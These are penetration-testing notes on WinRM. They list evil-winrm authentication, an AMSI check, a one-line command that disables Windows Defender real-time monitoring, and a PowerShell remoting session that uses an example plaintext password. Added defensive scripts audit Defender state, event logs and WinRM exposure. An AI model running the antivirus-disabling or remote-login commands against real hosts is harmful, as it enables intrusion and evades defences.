WinRM (5985,5986)

Authentication

evil-winrm -i <ip> -u <user> -p <pass>

AMSI Bypass

> #amsiscanbuffer
At line:1 char:1
+ #amsiscanbuffer
+ ~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.

# Try this as well
> Set-MpPreference -DisableRealtimeMonitoring $true
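The console block on `#amsiscanbuffer` above is AMSI inspecting console input (that string is a well-known AMSI test trigger), so it doubles as a check that AMSI is live. The added PowerShell below is not part of the original notes; it is the defender-side counterpart of this section: it reads the current Defender/AMSI state with `Get-MpComputerStatus` and `Get-MpPreference`, lists the AMSI providers registered under `HKLM:\SOFTWARE\Microsoft\AMSI\Providers`, and pulls Defender's operational events 5001 (real-time protection disabled) and 5004 (real-time protection configuration changed), which is what the `Set-MpPreference` line above leaves behind. It assumes an elevated PowerShell on a Windows host with Defender installed; the 24-hour window is an arbitrary choice.

```powershell
# Added example (not from the original notes): verify that AMSI and Defender
# real-time protection are on, and surface the events written when someone
# turns real-time protection off. Run elevated on the host being checked.

$status = Get-MpComputerStatus

# Tamper Protection is what stops Set-MpPreference -DisableRealtimeMonitoring
# from taking effect even for an administrator; without it the one-liner works.
[pscustomobject]@{
    AntimalwareService     = $status.AMServiceEnabled
    RealTimeProtection     = $status.RealTimeProtectionEnabled
    TamperProtected        = $status.IsTamperProtected
    RealtimeDisabledByPref = (Get-MpPreference).DisableRealtimeMonitoring
} | Format-List

# AMSI providers (Defender registers one here). Zero providers means the
# console block shown above would no longer fire for any scanner.
$amsiProviders = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue
"AMSI providers registered: $(@($amsiProviders).Count)"

# Detection: real-time protection disabled or reconfigured in the last 24 hours
# (window is an assumption; widen it for a real investigation).
$since  = (Get-Date).AddHours(-24)
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 5001, 5004
    StartTime = $since
} -ErrorAction SilentlyContinue

if ($events) {
    $events |
        Select-Object TimeCreated, Id, @{ n = 'Message'; e = { $_.Message.Split("`n")[0] } } |
        Format-Table -AutoSize
} else {
    "No real-time protection changes logged since $since"
}
```

If `TamperProtected` is `False` and `RealtimeDisabledByPref` is `True`, the host is in exactly the state the one-liner above produces; the 5001 event gives the timestamp to pivot from into logon and process-creation logs.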

PowerShell Remoting

PowerShell Remoting uses WinRM by default for cmdlets such as Enter-PSSession, so a user must be a member of the local Remote Management Users group to be a valid user for these cmdlets. SSH can also be used as the transport for PowerShell remoting instead of WinRM.

Creating a PowerShell remoting session via WinRM in a bind shell can cause unexpected behavior. Opt for evil-winrm instead.

> $password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force

> $cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password)

> Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred
[CLIENTWK220]: PS C:\Users\daveadmin\Documents> whoami
whoami
clientwk220\daveadmin
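The session above works because the account is allowed through WinRM; the added PowerShell below (not from the original notes) audits that exposure from the host's side: which listeners are up on 5985/5986, which authentication methods the service accepts, whether Basic auth with `AllowUnencrypted` would put credentials on the wire in clear text, who sits in Remote Management Users and Administrators, and whether the SSH transport mentioned above is also present. It assumes an elevated PowerShell on a Windows host with the WinRM service installed (the `WSMan:` drive) and the `Microsoft.PowerShell.LocalAccounts` module (Windows 10 / Server 2016 and later); the "broad principal" pattern in the findings is a heuristic of this example.

```powershell
# Added example (not from the original notes): audit how reachable this host is
# over WinRM and who is allowed in. Run in an elevated PowerShell on the host.

$report = [ordered]@{}

# 1. WinRM service state and listeners (HTTP 5985 / HTTPS 5986).
$svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
$report['WinRM service'] = if ($svc) { $svc.Status } else { 'not installed' }

if ($svc -and $svc.Status -eq 'Running') {
    foreach ($l in Get-ChildItem -Path WSMan:\localhost\Listener) {
        $props     = Get-ChildItem -Path $l.PSPath
        $transport = ($props | Where-Object Name -eq 'Transport').Value
        $port      = ($props | Where-Object Name -eq 'Port').Value
        $address   = ($props | Where-Object Name -eq 'Address').Value
        $report["Listener $($l.Name)"] = "$transport on $address port $port"
    }

    # 2. Authentication settings. Basic + AllowUnencrypted means the password
    #    and the whole session can cross port 5985 in clear text.
    $auth = Get-ChildItem -Path WSMan:\localhost\Service\Auth
    $report['Auth: Basic']      = ($auth | Where-Object Name -eq 'Basic').Value
    $report['Auth: Kerberos']   = ($auth | Where-Object Name -eq 'Kerberos').Value
    $report['Auth: Negotiate']  = ($auth | Where-Object Name -eq 'Negotiate').Value
    $report['AllowUnencrypted'] = (Get-Item -Path WSMan:\localhost\Service\AllowUnencrypted).Value
}

# 3. Who may open a remoting session: local Administrators always can; members
#    of Remote Management Users get the same door without admin rights.
foreach ($group in 'Administrators', 'Remote Management Users') {
    try {
        $members = Get-LocalGroupMember -Group $group -ErrorAction Stop
        $report["Group: $group"] = ($members | ForEach-Object { "$($_.Name) [$($_.ObjectClass)]" }) -join ', '
    } catch {
        $report["Group: $group"] = "could not enumerate: $($_.Exception.Message)"
    }
}

# 4. SSH as the alternative remoting transport.
$sshd = Get-Service -Name sshd -ErrorAction SilentlyContinue
$report['OpenSSH server (sshd)'] = if ($sshd) { $sshd.Status } else { 'not installed' }

# 5. Findings worth acting on (thresholds are this example's own choices).
$findings = @()
if ($report['Auth: Basic'] -eq 'true' -and $report['AllowUnencrypted'] -eq 'true') {
    $findings += 'Basic auth with AllowUnencrypted=true: credentials cross 5985 in clear text'
}
$hasHttps = $report.Keys | Where-Object { $_ -like 'Listener*' -and $report[$_] -like 'HTTPS*' }
if ($report['WinRM service'] -eq 'Running' -and -not $hasHttps) {
    $findings += 'No HTTPS (5986) listener; channel protection rests on Negotiate/Kerberos alone'
}
if ($report['Group: Remote Management Users'] -match 'Everyone|Authenticated Users|Domain Users') {
    $findings += 'Remote Management Users contains a broad principal; every such account can open a PSSession'
}

$report.GetEnumerator() | Format-Table -AutoSize
"`nFindings:"
if ($findings) { $findings | ForEach-Object { " - $_" } } else { ' - none' }
```

Each listener and auth value comes straight from the WSMan provider, so the same script doubles as a before/after check when tightening a host (for example after removing Basic auth or adding an HTTPS listener).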
